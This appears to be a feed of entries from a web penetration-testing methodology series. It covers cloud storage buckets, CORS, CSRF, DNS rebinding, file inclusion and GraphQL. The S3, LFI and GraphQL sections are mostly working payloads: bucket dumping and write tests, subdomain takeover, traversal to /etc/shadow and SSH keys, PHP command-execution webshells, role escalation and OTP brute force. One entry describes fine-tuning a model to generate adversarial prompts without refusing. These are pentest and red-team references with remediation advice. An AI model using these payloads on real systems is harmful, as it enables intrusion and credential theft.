Test read access: download sensitive files (backups, configs, keys)
Test write access: upload a file, check if it’s accessible
Check ACL: public-read, public-read-write, authenticated-read
Check for exposed .env, *.pem, *.key, backup.sql files
Test Azure Blob Container public access level
Test GCS bucket IAM (allUsers, allAuthenticatedUsers)
Look for signed URL leakage (S3 pre-signed URLs in responses/logs)

Payload Library

Attack 1 — AWS S3 Enumeration

# Check if bucket exists and is public:
curl -s "https://BUCKET_NAME.s3.amazonaws.com/" | grep -i "ListBucketResult\|Access Denied\|NoSuchBucket"

# List bucket contents (if public list):
aws s3 ls s3://BUCKET_NAME --no-sign-request
aws s3 ls s3://BUCKET_NAME --no-sign-request --recursive

# Download all files (public read):
aws s3 sync s3://BUCKET_NAME /tmp/bucket_dump --no-sign-request

# Try common bucket name patterns:
TARGET="company-name"
for suffix in "" "-backup" "-assets" "-static" "-dev" "-staging" \
              "-prod" "-files" "-uploads" "-media" "-data" "-logs" \
              "-config" "-secret" "-private" "-internal"; do
  bucket="${TARGET}${suffix}"
  status=$(curl -so /dev/null -w "%{http_code}" \
    "https://${bucket}.s3.amazonaws.com/")
  echo "${bucket}: $status"
done

# Check bucket region:
curl -s "https://BUCKET_NAME.s3.amazonaws.com/" -I | grep -i "x-amz-bucket-region"

# Authenticated enumeration (with own AWS credentials):
aws s3api list-objects --bucket BUCKET_NAME --output json | \
  jq '.Contents[].Key'

# Test write access:
echo "pentest" > /tmp/test.txt
aws s3 cp /tmp/test.txt s3://BUCKET_NAME/pentest_test.txt --no-sign-request
# If succeeds → public write (critical!)

Attack 2 — Interesting Files to Hunt

# Search for sensitive files once you have read access:
BUCKET="target-bucket"

# Database dumps:
aws s3 ls s3://$BUCKET --recursive --no-sign-request | \
  grep -iE "\.sql|\.dump|\.bak|\.backup"

# Config and secrets:
aws s3 ls s3://$BUCKET --recursive --no-sign-request | \
  grep -iE "\.env|config\.|secret|credentials|\.pem|\.key|\.p12|\.pfx"

# Code:
aws s3 ls s3://$BUCKET --recursive --no-sign-request | \
  grep -iE "\.php|\.py|\.js|\.rb|\.jar|\.war"

# Download interesting files:
aws s3 cp s3://$BUCKET/.env /tmp/.env --no-sign-request
aws s3 cp s3://$BUCKET/backup.sql /tmp/backup.sql --no-sign-request
aws s3 cp s3://$BUCKET/config.json /tmp/config.json --no-sign-request

Attack 3 — Google Cloud Storage (GCS)

# Check public bucket:
curl -s "https://storage.googleapis.com/BUCKET_NAME/" | \
  grep -i "Contents\|AccessDenied\|NoSuchBucket"

# List with gsutil:
gsutil ls gs://BUCKET_NAME
gsutil ls -r gs://BUCKET_NAME   # recursive

# Check IAM policy:
gsutil iam get gs://BUCKET_NAME

# Download:
gsutil cp gs://BUCKET_NAME/sensitive_file /tmp/

# Test all-users read:
curl -s "https://storage.googleapis.com/BUCKET_NAME/test_file" -I

# Find GCS buckets via HTTPS:
curl -s "https://BUCKET_NAME.storage.googleapis.com/"

Attack 4 — Azure Blob Storage

# Check container public access:
curl -s "https://ACCOUNT_NAME.blob.core.windows.net/CONTAINER_NAME?restype=container&comp=list" | \
  grep -i "EnumerationResults\|AuthorizationFailed\|ResourceNotFound"

# List blobs (public container):
curl -s "https://ACCOUNT_NAME.blob.core.windows.net/CONTAINER_NAME?restype=container&comp=list"

# Download blob:
curl -s "https://ACCOUNT_NAME.blob.core.windows.net/CONTAINER_NAME/BLOB_NAME" -o file

# Test write (public write):
curl -X PUT "https://ACCOUNT_NAME.blob.core.windows.net/CONTAINER_NAME/pwned.txt" \
  -H "x-ms-blob-type: BlockBlob" \
  -d "compromised"

# Azure enumeration tool:
pip3 install blobstoragemicroscope
# Or use MicroBurst:
# https://github.com/NetSPI/MicroBurst

Attack 5 — Subdomain Takeover via S3

# CNAME pointing to unclaimed S3 bucket:
# static.target.com → target-static.s3-website-us-east-1.amazonaws.com
# Bucket doesn't exist → claim it

# Create bucket with same name:
aws s3api create-bucket --bucket target-static --region us-east-1
aws s3 website s3://target-static/ --index-document index.html
aws s3api put-bucket-policy --bucket target-static --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "PublicRead",
    "Effect": "Allow",
    "Principal": "*",
    "Action": ["s3:GetObject"],
    "Resource": "arn:aws:s3:::target-static/*"
  }]
}'

# Upload PoC:
echo '<html><body>Subdomain Takeover via S3</body></html>' > index.html
aws s3 cp index.html s3://target-static/

Tools

# S3Scanner:
pip3 install s3scanner
s3scanner scan --buckets target-backup,target-assets,target-prod

# CloudBrute — cloud storage brute forcing:
git clone https://github.com/0xsha/CloudBrute
./CloudBrute -d target.com -k target -m storage -l 200 -o results.txt

# GrayhatWarfare — search public buckets:
# https://buckets.grayhatwarfare.com (web UI)

# bucket-finder:
bucket_finder.rb target.com

# truffleHog — find secrets in bucket contents:
trufflehog s3 --bucket=BUCKET_NAME

# AWS CLI:
aws s3 ls s3://BUCKET --no-sign-request
aws s3api get-bucket-acl --bucket BUCKET --no-sign-request
aws s3api get-bucket-policy --bucket BUCKET --no-sign-request

# Check CORS on S3:
curl -sI "https://BUCKET.s3.amazonaws.com/" \
  -H "Origin: https://evil.com" | grep -i "access-control"

# Find buckets from SSL certs / JS files:
grep -rn "s3\.amazonaws\.com\|s3-.*\.amazonaws\.com\|\.storage\.googleapis\.com" \
  --include="*.js" .

Remediation Reference

Block all public access: AWS S3 “Block Public Access” setting at account level
Explicit deny policy: add bucket policy that denies s3:* to * (public)
Use presigned URLs for temporary access instead of public buckets
Enable S3 server access logging: detect unauthorized access attempts
Apply principle of least privilege to IAM roles that access buckets
Enable MFA Delete on S3 buckets containing critical data
Regular audit: use AWS Config, GCP Security Command Center, or Azure Defender to continuously check bucket permissions
Avoid predictable bucket names: don’t use company name + common suffixes

Part of the Web Application Penetration Testing Methodology series.

CORS Misconfiguration

Tue, 24 Feb 2026 00:00:00 +0000

CORS Misconfiguration

Severity: High | CWE: CWE-942 OWASP: A01:2021 – Broken Access Control

What Is CORS?

Cross-Origin Resource Sharing (CORS) allows browsers to make cross-origin requests. A server opts in by returning Access-Control-Allow-Origin headers. The vulnerability occurs when the server reflects the attacker’s origin, allows null origin, or uses overly broad wildcards — combined with Access-Control-Allow-Credentials: true — letting an attacker’s site read authenticated responses from the victim’s browser.

Normal same-origin: browser blocks cross-origin reads (by default)
CORS misconfigured: server says "yes, attacker.com can read my responses"
                    → attacker.com JS reads victim's authenticated API data

Key rule: Access-Control-Allow-Origin: * with Access-Control-Allow-Credentials: true is spec-forbidden — browsers reject it. The dangerous case is when the server dynamically reflects a specific origin.

CSRF (Cross-Site Request Forgery)

Tue, 24 Feb 2026 00:00:00 +0000

CSRF (Cross-Site Request Forgery)

Severity: High | CWE: CWE-352 OWASP: A01:2021 – Broken Access Control

What Is CSRF?

CSRF forces an authenticated user’s browser to send a forged request to a target site. The browser automatically includes cookies (session tokens) with same-site requests, so the forged request carries valid authentication. The attacker doesn’t steal credentials — they hijack the session action.

Victim is logged into bank.com (has session cookie)
Attacker sends victim to: evil.com/csrf.html
Page silently submits: POST bank.com/transfer?to=attacker&amount=5000
Browser auto-attaches: Cookie: session=VALID_SESSION
Bank processes it: ✓ authenticated, executes transfer

Conditions required:

Default Credentials

Tue, 24 Feb 2026 00:00:00 +0000

Default Credentials

Severity: Critical | CWE: CWE-1392, CWE-521 OWASP: A07:2021 – Identification and Authentication Failures

What Is the Attack?

Default credential attacks target systems where the vendor-supplied default username/password was never changed. This encompasses network devices, databases, application frameworks, content management systems, IoT devices, and cloud management consoles. Despite being one of the oldest attacks, it remains one of the most consistently successful — particularly against internal network services discovered through prior access, and against externally-facing admin interfaces.

DNS Rebinding

Tue, 24 Feb 2026 00:00:00 +0000

DNS Rebinding

Severity: High | CWE: CWE-350, CWE-184 OWASP: A01:2021 – Broken Access Control | A05:2021 – Security Misconfiguration

What Is DNS Rebinding?

DNS rebinding attacks abuse the browser’s same-origin policy (SOP) by manipulating DNS resolution. The attacker controls a domain whose DNS TTL is set very low. When a victim visits the attacker’s page:

Browser resolves evil.com → attacker’s IP (serves malicious JS)
JS runs in the victim’s browser, waits for DNS TTL to expire
DNS record is changed: evil.com → 127.0.0.1 (or internal IP)
JS makes a cross-origin fetch to evil.com — browser resolves again → now gets 127.0.0.1
SOP considers both requests same-origin (same domain evil.com) → request succeeds
Attacker JS reads the response from the internal service running on 127.0.0.1

Attack targets: internal services, router admin panels, Kubernetes API, Docker daemon, Prometheus, Consul, Jupyter notebooks, development servers — any HTTP service on localhost or private network accessible from the victim’s browser.

Docker Security Testing

Tue, 24 Feb 2026 00:00:00 +0000

Docker Security Testing

Severity: Critical | CWE: CWE-284, CWE-269 OWASP: A05:2021 – Security Misconfiguration | A01:2021 – Broken Access Control

What Is the Docker Attack Surface?

Docker’s attack surface includes the Docker daemon REST API (accessible via UNIX socket or TCP), container escape via privileged containers and dangerous volume mounts, container image vulnerabilities, and insecure registries. A single misconfiguration — like exposing the Docker socket to a container — typically results in full host compromise.

DOM Clobbering

Tue, 24 Feb 2026 00:00:00 +0000

DOM Clobbering

Severity: Medium–High | CWE: CWE-79, CWE-20 OWASP: A03:2021 – Injection | A05:2021 – Security Misconfiguration

What Is DOM Clobbering?

DOM Clobbering exploits the browser behavior where HTML elements with id or name attributes become properties on the global window object (and document object). When JavaScript code references window.x or document.x without first defining it, an attacker who can inject HTML can control that reference by injecting an element with id="x".

DOM XSS: Source-to-Sink Tracing & Encoding Bypass

Tue, 24 Feb 2026 00:00:00 +0000

DOM XSS: Source-to-Sink Tracing & Encoding Bypass

Severity: High | CWE: CWE-79 | OWASP: A03:2021 Reference: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Why DOM XSS Evades Server-Side Sanitization

The payload never reaches the server. It goes from a URL source (e.g., location.hash) directly to a dangerous sink (e.g., innerHTML) entirely in browser JavaScript. Server-side sanitization, WAFs inspecting HTTP traffic, and traditional scanners all miss it.

The attack surface is the JavaScript code itself — you must read it.

Eclipse Jetty

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Eclipse Jetty is a widely deployed Java-based HTTP server and servlet container. It is commonly embedded in products such as Jenkins, SonarQube, Elasticsearch, and many enterprise Java applications. Jetty’s long history has produced several significant path traversal vulnerabilities, particularly around URL encoding and request parsing, leading to unauthorized access to WEB-INF contents, web.xml files, and sensitive application configuration.

Default Ports:

Port	Service
8080	HTTP
8443	HTTPS
8009	AJP (if configured)

Recon and Fingerprinting

Service Detection

nmap -sV -p 8080,8443 TARGET_IP
nmap -p 8080 --script http-headers,http-title,http-server-header TARGET_IP

Version Fingerprinting

# Server header reveals Jetty version
curl -sv http://TARGET_IP:8080/ 2>&1 | grep -i "Server:"

# X-Powered-By header
curl -sv http://TARGET_IP:8080/ 2>&1 | grep -i "X-Powered-By"

# Error page fingerprinting
curl -s http://TARGET_IP:8080/nonexistent_page_12345 | grep -i jetty

# Robots.txt / sitemap
curl -s http://TARGET_IP:8080/robots.txt
curl -s http://TARGET_IP:8080/sitemap.xml

Directory and Path Discovery

# Common Jetty paths
for path in "/" "/index.html" "/WEB-INF/" "/WEB-INF/web.xml" "/META-INF/" "/favicon.ico" "/.well-known/" "/test/" "/examples/" "/demo/"; do
  CODE=$(curl -s -o /dev/null -w "%{http_code}" "http://TARGET_IP:8080$path")
  echo "$CODE : http://TARGET_IP:8080$path"
done

CVE-2021-28164 — Path Traversal

CVSS: 5.3 Medium Affected: Jetty 9.4.37.v20210219 to 9.4.38.v20210224 Type: Path traversal in URI handling CWE: CWE-22

Enovia 3DEXPERIENCE Platform

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Enovia is Dassault Systèmes’ Product Lifecycle Management (PLM) application running on the 3DEXPERIENCE platform. It is deployed in aerospace, defense, automotive, pharmaceutical, and manufacturing industries. The platform manages CAD models, BOMs (Bills of Materials), engineering workflows, regulatory compliance documentation, and sensitive intellectual property. From a security perspective, 3DEXPERIENCE has a large REST API attack surface, complex access control, and numerous default configurations that can lead to unauthorized data access.

Exposed Admin Interfaces & Management Endpoints

Tue, 24 Feb 2026 00:00:00 +0000

Exposed Admin Interfaces & Management Endpoints

Severity: Critical | CWE: CWE-200, CWE-284 OWASP: A05:2021 – Security Misconfiguration | A01:2021 – Broken Access Control

What Is the Target?

Admin interfaces are management endpoints that expose high-privilege operations: Spring Boot Actuator (environment variables, heap dumps, thread dumps, HTTP trace logs, bean definitions), Prometheus metrics (may include secrets in metric labels), Grafana (dashboards + data source credential access), Kibana (full Elasticsearch access), Consul (service mesh + secrets), Vault (if UI exposed), Jupyter (code execution), Jenkins (pipeline execution), and custom admin panels.

Expression Language Injection (EL / SpEL)

Tue, 24 Feb 2026 00:00:00 +0000

Expression Language Injection (EL / SpEL)

Severity: Critical | CWE: CWE-917 OWASP: A03:2021 – Injection

What Is Expression Language Injection?

Expression Language (EL) is used in Java-based frameworks to bind data between UI and business logic. When user input is evaluated as an EL expression, the attacker gains access to the full Java runtime — leading to RCE. Two distinct attack surfaces:

Java EL (JSP/JSF/Jakarta EE):

Used in ${...} and #{...} contexts in .jsp, .jsf, .xhtml files
Evaluated server-side by the EL runtime (JUEL, Eclipse Mojarra, etc.)
Access to Runtime, ProcessBuilder, class loading chain

Spring SpEL (Spring Expression Language):

File Inclusion (LFI / RFI)

Tue, 24 Feb 2026 00:00:00 +0000

File Inclusion (LFI / RFI)

Severity: Critical | CWE: CWE-98, CWE-22 OWASP: A03:2021 – Injection

What Is File Inclusion?

PHP and other server-side languages allow dynamic file inclusion via include(), require(), include_once(), require_once(). When the included filename is attacker-controlled:

LFI (Local File Inclusion) — read local files, potentially execute code via log poisoning or PHP wrappers
RFI (Remote File Inclusion) — include remote URL as PHP code (requires allow_url_include=On)

// Vulnerable code patterns:
include($_GET['page'] . ".php");       // append .php
include("pages/" . $_GET['template']); // prefix + user input
require($_POST['module']);              // full control

Discovery Checklist

Find parameters that load file paths: page=, file=, template=, lang=, module=, include=, path=, view=
Test basic traversal: ../../../etc/passwd
Test with and without extension appending (does error show extension?)
Test PHP wrappers: php://filter, php://input, data://, expect://
Test null byte termination for PHP < 5.3.4: ../../../etc/passwd%00
Test path normalization: ....//....//....//etc/passwd
Test log poisoning → LFI to RCE
Check error messages for absolute path disclosure
Test RFI if app allows external URLs
Test /proc/self/environ poisoning via User-Agent
Test /proc/self/fd/[n] for open file descriptor log access
Test ZIP/PHAR wrappers for LFI to RCE

Payload Library

Payload 1 — Basic LFI Path Traversal

# Linux targets:
../../../etc/passwd
../../../etc/shadow
../../../etc/hosts
../../../etc/hostname
../../../proc/version
../../../proc/self/cmdline
../../../proc/self/environ
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/auth.log
../../../var/log/mail.log
../../../home/USER/.bash_history
../../../home/USER/.ssh/id_rsa
../../../root/.bash_history
../../../root/.ssh/id_rsa
../../../etc/mysql/my.cnf
../../../etc/php/php.ini
../../../var/www/html/config.php

# Windows targets:
..\..\..\windows\win.ini
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\inetpub\wwwroot\web.config
..\..\..\xampp\apache\conf\httpd.conf
C:\windows\win.ini
C:\inetpub\wwwroot\web.config

# URL-encoded variants:
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd    # double-encoded
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd  # overlong UTF-8

# Null byte (PHP < 5.3.4) — truncate extension append:
../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd\0

# Dot truncation (Windows, long paths) — extension gets cut off:
../../../windows/win.ini..........[add many dots/spaces]

# Extra dot/slash normalization bypass:
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
..././..././..././etc/passwd

Payload 2 — PHP Wrappers

# php://filter — read file source without executing (base64):
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/read=string.rot13/resource=index.php
php://filter/convert.iconv.utf-8.utf-16/resource=index.php

# Decode base64 output:
echo "BASE64_OUTPUT" | base64 -d

# php://filter chains (PHP 8 / newer — multiple filters):
php://filter/convert.iconv.UTF-8.UTF-32|convert.base64-encode/resource=/etc/passwd

# php://input — execute POST body as PHP (requires allow_url_include or include):
# Send: include('php://input')
# POST body: <?php system($_GET['cmd']); ?>

# data:// wrapper — inline code execution:
data://text/plain,<?php system('id');?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+
# base64 of: <?php system('id');?>

# expect:// — direct command execution (requires expect extension):
expect://id
expect://whoami
expect://cat+/etc/passwd

# zip:// wrapper — execute PHP in a ZIP archive:
# Create: echo "<?php system($_GET['cmd']); ?>" > shell.php && zip shell.zip shell.php
zip://path/to/uploaded/shell.zip%23shell.php

# phar:// wrapper — PHAR deserialization (see 20_Deser_PHP.md):
phar://path/to/uploaded/file.jpg

# Combining wrappers:
php://filter/convert.base64-decode/resource=data://text/plain,PD9waHAgcGhwaW5mbygpOz8+

Payload 3 — Log Poisoning → LFI to RCE

Poison a log file with PHP code via a user-controlled field, then include the log file.

File Upload Bypass

Tue, 24 Feb 2026 00:00:00 +0000

File Upload Bypass

Severity: Critical | CWE: CWE-434 OWASP: A03:2021 – Injection / A04:2021 – Insecure Design

What Is File Upload Bypass?

File upload vulnerabilities occur when an application accepts user-uploaded files without adequate validation, allowing attackers to upload and execute malicious code or access sensitive files. The attack impact scales from stored XSS to full server compromise depending on execution context.

Upload Vector → Bypass Filter → Store File → Trigger Execution
     ↑                ↑               ↑              ↑
  multipart        extension      web root,      direct access,
  PUT API          MIME type      readable       LFI include,
  avatar           content sig    path           image proc,
  import           size           predictable    PHAR trigger

Discovery Checklist

Phase 1 — Enumeration

Fine-Tuning Qwen 2.5 14B to Generate Adversarial Prompts with Emotional Load

Tue, 24 Feb 2026 00:00:00 +0000

Fine-Tuning Qwen 2.5 14B to Generate Adversarial Prompts with Emotional Load

Building an adversarial LLM for red teaming is not particularly complicated in 2025, but it requires making deliberate choices about model selection, training data design, hardware, and fine-tuning technique. This post documents exactly what we did: fine-tuning Qwen 2.5 14B to generate realistic, emotionally charged prompts for continuous prompt injection testing and LLM security assessments.

The Problem: Why Off-the-Shelf Models Are Not Enough

When you do LLM security testing at scale, you need thousands of varied, contextually realistic adversarial prompts covering a range of attack vectors. Manually writing these is slow and gets repetitive. Standard models refuse. Ask GPT-4 to generate a realistic prompt that impersonates an executive asking for database credentials, and it declines. The alternative is to fine-tune a capable open-weight model that produces this material without refusal — and produces it at a quality level that makes it actually useful for red team work.

From Neurons to GPT: How Neural Networks and Large Language Models Actually Work

Tue, 24 Feb 2026 00:00:00 +0000

From Neurons to GPT: How Neural Networks and Large Language Models Actually Work

There is a lot of hype around LLMs and not enough signal about what is actually happening under the hood. This post tries to fix that. Starting from the absolute basics — a single artificial neuron — we will build up, step by step, to a full understanding of how a model like GPT works. Every concept is grounded in real code and real math.

GraphQL Injection

Tue, 24 Feb 2026 00:00:00 +0000

GraphQL Injection

Severity: Critical | CWE: CWE-89, CWE-78, CWE-918 OWASP: A03:2021 – Injection

What Is GraphQL Injection?

GraphQL injection is distinct from GraphQL-level abuse (rate limiting, introspection, DoS — covered in Chapter 83). This chapter focuses on second-order injection through GraphQL resolvers: the SQL, command, SSTI, NoSQL, or SSRF payloads that flow through GraphQL arguments into backend systems that trust them.

GraphQL arguments bypass many traditional WAF rules because:

The payload is inside JSON with a GraphQL-specific syntax
Nested fields and aliases obscure the injection point
GraphQL variables allow multi-step payload delivery
Batch/alias attacks multiply the injection surface

GraphQL injection path:
  { users(search: "' OR '1'='1") { id email } }
                     ↓
  Resolver: db.query(`SELECT * FROM users WHERE name = '${args.search}'`)
                     ↓
  SQL injection via resolver argument

Discovery Checklist

Phase 1 — Enumerate Injection Points

GraphQL Security Testing

Tue, 24 Feb 2026 00:00:00 +0000

GraphQL Security Testing

Severity: High–Critical | CWE: CWE-284, CWE-200, CWE-400 OWASP: A01:2021 – Broken Access Control | A05:2021 – Security Misconfiguration

What Is GraphQL?

GraphQL is a query language for APIs where clients specify exactly what data they need. Unlike REST, GraphQL exposes a single endpoint (/graphql, /api/graphql) and allows flexible queries, mutations, and subscriptions. Security issues arise from introspection, missing authorization, batching abuse, and complex query DoS.

# Query (read):
query {
  user(id: 1) { name email role }
}

# Mutation (write):
mutation {
  createUser(input: {name: "attacker", role: "admin"}) { id }
}

# Subscription (real-time):
subscription {
  newMessage { content sender }
}

Discovery Checklist

Find GraphQL endpoint: /graphql, /api/graphql, /gql, /query, /v1/graphql
Try GET /graphql?query={__typename} — quick existence check
Check introspection: {__schema{types{name}}} — enabled in production?
Map all types, queries, mutations via introspection
Test missing authorization on queries (no auth required for sensitive data)
Test IDOR on object IDs in queries
Test mutations for privilege escalation (role field, admin flag)
Test query batching — send array of queries: [{query:...},{query:...}]
Test alias-based query multiplication
Test deeply nested queries for DoS (no depth/complexity limits)
Test introspection bypass (disabled? → try field name guessing)
Look for debug fields: __debug, _service, sdl
Test HTTP verb: many endpoints accept both GET and POST
Check for Content-Type: application/json vs multipart/form-data (file upload)

Payload Library

Payload 1 — Introspection Queries

# Full schema dump:
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      ...FullType
    }
    directives {
      name description locations args { ...InputValue }
    }
  }
}

fragment FullType on __Type {
  kind name description
  fields(includeDeprecated: true) {
    name description
    args { ...InputValue }
    type { ...TypeRef }
    isDeprecated deprecationReason
  }
  inputFields { ...InputValue }
  interfaces { ...TypeRef }
  enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason }
  possibleTypes { ...TypeRef }
}

fragment InputValue on __InputValue {
  name description type { ...TypeRef } defaultValue
}

fragment TypeRef on __Type {
  kind name
  ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } }
}

# Quick introspection via curl:
curl -s -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name kind}}}"}' | python3 -m json.tool

# Get all queries and mutations:
curl -s -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{queryType{fields{name description args{name type{name kind}}}}}}"}' \
  | python3 -m json.tool

# List all mutations:
curl -s -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{mutationType{fields{name description args{name type{name}}}}}}"}' \
  | python3 -m json.tool

Payload 2 — Introspection Bypass Techniques

# If introspection is blocked → try alternate formats:

# Method suggestion (partial introspection):
{"query": "{__type(name: \"User\") {fields {name type {name}}}}"}

# Typename leak:
{"query": "{__typename}"}

# Field suggestion: send invalid field → error reveals valid fields
{"query": "{ user { invalidField } }"}
# Error: "Did you mean 'email'? 'username'? 'role'?"

# Disable introspection bypass via newlines (some implementations):
{"query": "{\n __schema\n{\ntypes\n{\nname\n}\n}\n}"}

# Via GET request (different parser path):
GET /graphql?query={__schema{types{name}}}

# Fragment-based (bypass regex filters on "__schema"):
{"query": "fragment f on __Schema { types { name } } { ...f }"}

# X-Apollo-Tracing header sometimes re-enables debug:
-H "X-Apollo-Tracing: 1"

# Playground / IDE endpoints (often unrestricted):
GET /graphiql          # GraphiQL
GET /graphql/playground  # Apollo Playground
GET /altair            # Altair client
GET /voyager          # GraphQL Voyager

Payload 3 — Authorization Testing

# Query without authentication → sensitive data?
curl -s -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ users { id email role password } }"}'

# IDOR via ID enumeration:
for id in $(seq 1 50); do
  curl -s -X POST https://target.com/graphql \
    -H "Content-Type: application/json" \
    -H "Authorization: Bearer YOUR_LOW_PRIV_TOKEN" \
    -d "{\"query\":\"{ user(id: $id) { id email role privateData } }\"}"
done

# Access another user's private data:
{"query": "{ user(id: 1337) { email billingAddress creditCard } }"}

# Try admin queries with user token:
{"query": "{ adminPanel { users { id email isAdmin } } }"}
{"query": "{ allUsers { nodes { id email passwordHash } } }"}

Payload 4 — Mutation Privilege Escalation

# Modify own role:
curl -s -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer USER_TOKEN" \
  -d '{"query":"mutation { updateUser(id: \"MY_ID\", input: {role: \"admin\"}) { id role } }"}'

# Create admin user:
{"query": "mutation { createUser(input: {email: \"attacker@evil.com\", password: \"pass\", role: \"admin\", isAdmin: true}) { id } }"}

# Password reset without token:
{"query": "mutation { resetPassword(email: \"victim@corp.com\") { success } }"}

# Delete another user's data (IDOR via mutation):
{"query": "mutation { deletePost(id: \"VICTIM_POST_ID\") { success } }"}

# Mass assignment in mutation — try extra fields:
{
  "query": "mutation { updateProfile(input: {name: \"test\", isAdmin: true, role: \"superadmin\", verified: true, credits: 99999}) { id name role } }"
}

Payload 5 — Batching / Brute Force via Aliases

# Query batching — send array of requests (bypasses rate limit per-request):
curl -s -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '[
    {"query": "mutation { login(email:\"admin@corp.com\", password:\"password1\") { token } }"},
    {"query": "mutation { login(email:\"admin@corp.com\", password:\"password2\") { token } }"},
    {"query": "mutation { login(email:\"admin@corp.com\", password:\"password3\") { token } }"}
  ]'

# Alias-based batching in single request:
mutation {
  a1: login(email: "admin@corp.com", password: "password1") { token }
  a2: login(email: "admin@corp.com", password: "password2") { token }
  a3: login(email: "admin@corp.com", password: "password3") { token }
}

# Alias OTP brute-force (all 10000 codes in one request):
# Generate query:
python3 -c "
queries = []
for i in range(10000):
    code = f'{i:04d}'
    queries.append(f'a{i}: verifyOTP(code: \"{code}\") {{ valid }}')
print('mutation {\\n' + '\\n'.join(queries) + '\\n}')
" > brute_otp.graphql

Payload 6 — Query Depth / Complexity DoS

# Deeply nested query — exponential server-side resolution:
{
  user(id: 1) {
    friends {
      friends {
        friends {
          friends {
            friends {
              friends {
                id email
              }
            }
          }
        }
      }
    }
  }
}

# Circular fragment DoS:
fragment f1 on User { friends { ...f2 } }
fragment f2 on User { friends { ...f1 } }
{ user(id: 1) { ...f1 } }

# Field duplication:
{ user(id:1) { id id id id id id id id id id id } }

# Python generator for deep nesting:
depth = 20
query = "{ user(id: 1) { " + "friends { " * depth + "id" + " }" * depth + " }"
print(query)

Payload 7 — Information Disclosure

# Check for debug / tracing fields:
{"query": "{ __typename _service { sdl } }"}  # Apollo Federation SDL
{"query": "{ _entities(representations: []) { __typename } }"}  # Federation
{"query": "{ __schema { description } }"}

# Error messages revealing internals:
{"query": "{ user(id: \"' OR 1=1--\") { id } }"}  # SQLi via GraphQL
{"query": "{ user(id: \"$(id)\") { id } }"}        # CMDi via GraphQL
{"query": "{ fileContent(path: \"/etc/passwd\") { content } }"}  # LFI via field

# Subscription enumeration:
{"query": "subscription { newUser { id email password } }"}

# Check for __resolveType disclosure:
{"query": "{ node(id: \"VXNlcjox\") { __typename ... on User { email role } } }"}

Payload 8 — GraphQL Injection (SQLi/CMDi via Resolver)

# If resolver passes args directly to SQL:
{"query": "{ user(name: \"admin' UNION SELECT password FROM users--\") { id } }"}
{"query": "{ search(query: \"test' OR '1'='1\") { results } }"}

# NoSQLi via GraphQL:
{"query": "{ users(filter: {email: {$gt: \"\"}}) { nodes { id email } } }"}

# SSRF via GraphQL URL field:
{"query": "{ importProfile(url: \"http://169.254.169.254/latest/meta-data/\") { data } }"}
{"query": "{ webhook(url: \"http://COLLABORATOR_ID.oast.pro/test\") { status } }"}

# SSTI via template field:
{"query": "{ renderEmail(template: \"{{7*7}}\") { output } }"}

Tools

# GraphQL Voyager — visual schema explorer:
# Load introspection result → visual graph of all types/relations

# InQL — Burp Suite extension (essential):
# BApp Store → InQL
# Auto-generates query templates from introspection
# Batch attack mode

# graphw00f — GraphQL engine fingerprinting:
git clone https://github.com/dolevf/graphw00f
python3 graphw00f.py -t https://target.com/graphql

# clairvoyance — schema recovery without introspection:
git clone https://github.com/nikitastupin/clairvoyance
python3 -m clairvoyance -u https://target.com/graphql -w wordlist.txt

# GraphQL cop — security audit tool:
pip3 install graphql-cop
graphql-cop -t https://target.com/graphql

# Dump full schema via introspection:
python3 -c "
import requests, json
r = requests.post('https://target.com/graphql',
    json={'query': open('introspection_query.graphql').read()},
    headers={'Authorization': 'Bearer TOKEN'})
print(json.dumps(r.json(), indent=2))
"

# graphql-path-enum — enumerate hidden paths:
git clone https://github.com/nicowillis/graphql-path-enum

# curl quick tests:
# Check introspection:
curl -s -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name}}}"}' | jq '.data.__schema.types[].name'

# List all queries:
curl -s -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{queryType{fields{name}}}}"}' | jq '.data.__schema.queryType.fields[].name'

Remediation Reference

Disable introspection in production: configure server to block __schema and __type queries
Query depth limiting: max 5–10 levels; reject deeper queries
Query complexity limits: assign cost to each field, reject queries above threshold
Rate limiting per operation: limit both batched arrays and aliased queries
Authorization at resolver level: check permissions on every resolver, not just entry point
Persistent query allowlisting: only accept pre-registered query hashes in production
Disable batching if not required by the client application
Input validation: treat GraphQL args as untrusted input (prevent SQL/NoSQL/CMDi injection)

Part of the Web Application Penetration Testing Methodology series.

gRPC Security Testing

Tue, 24 Feb 2026 00:00:00 +0000

gRPC Security Testing

Severity: High | CWE: CWE-284, CWE-20 OWASP: A01:2021 – Broken Access Control | A03:2021 – Injection

What Is gRPC?

gRPC is Google’s Remote Procedure Call framework using HTTP/2 as transport and Protocol Buffers (protobuf) as the serialization format. Unlike REST, gRPC uses a binary wire format and requires a .proto schema definition. The attack surface differs significantly from REST APIs:

Binary encoding obscures payloads from passive inspection
gRPC reflection (server-side schema discovery) often left enabled in production
